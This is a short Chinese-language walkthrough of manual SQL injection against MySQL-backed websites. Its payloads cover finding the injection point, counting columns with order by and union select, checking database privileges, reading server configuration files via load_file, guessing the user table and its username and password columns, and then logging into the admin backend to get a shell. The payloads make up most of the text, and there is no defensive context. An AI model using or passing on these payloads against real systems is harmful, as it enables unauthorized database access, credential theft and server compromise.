1.判断注入点~ ：’;and 1=1;and 1=2 -------(跟ASP一样)

　　2.判断是否能进行UNION查询~：and ord(mid(version(),1,1))>51-------(通过版本判断4.0以上可用UNION查询)

　　3.利用order by暴字段~：order by X-------(X为数字如果返回正常则说明字段大于X)

　　4.利用union来查询准确字段~： and 1=2 union select 1,2,3,.......-------(返回正常，就说明猜到准确字段数。)

　　5.判断数据库连接帐号有没有写权限~：and (select count(*) from mysql.user)>0------- (如果返回错误我们就猜管理员的帐号密码如果返回正常，则可以通过and 1 =2 union select 1,2,3,4,5,6, load_file(char(文件路径的ascii值，用逗号隔开)),8,9,10 [注意：load_file(char(文件路径的ascii值，用逗号隔开))也可以用十六进制，通过这种方式读取配置文件])

　　6.猜解XXXX表~：and 1=2 union select 1,2,3,4,5,6.... from user--------(XXXX为表单名，返回正常，说明存在这个表)

　　7.猜XXX字段~：and 1=2 union select 1,username,3,4,5,6.... from XXXX-------(同样道理，自己替换，如果在2字段显示出字段内容则存在些字段)

　　8.同理再猜解password字段,猜解成功再找后台登录上SHELL。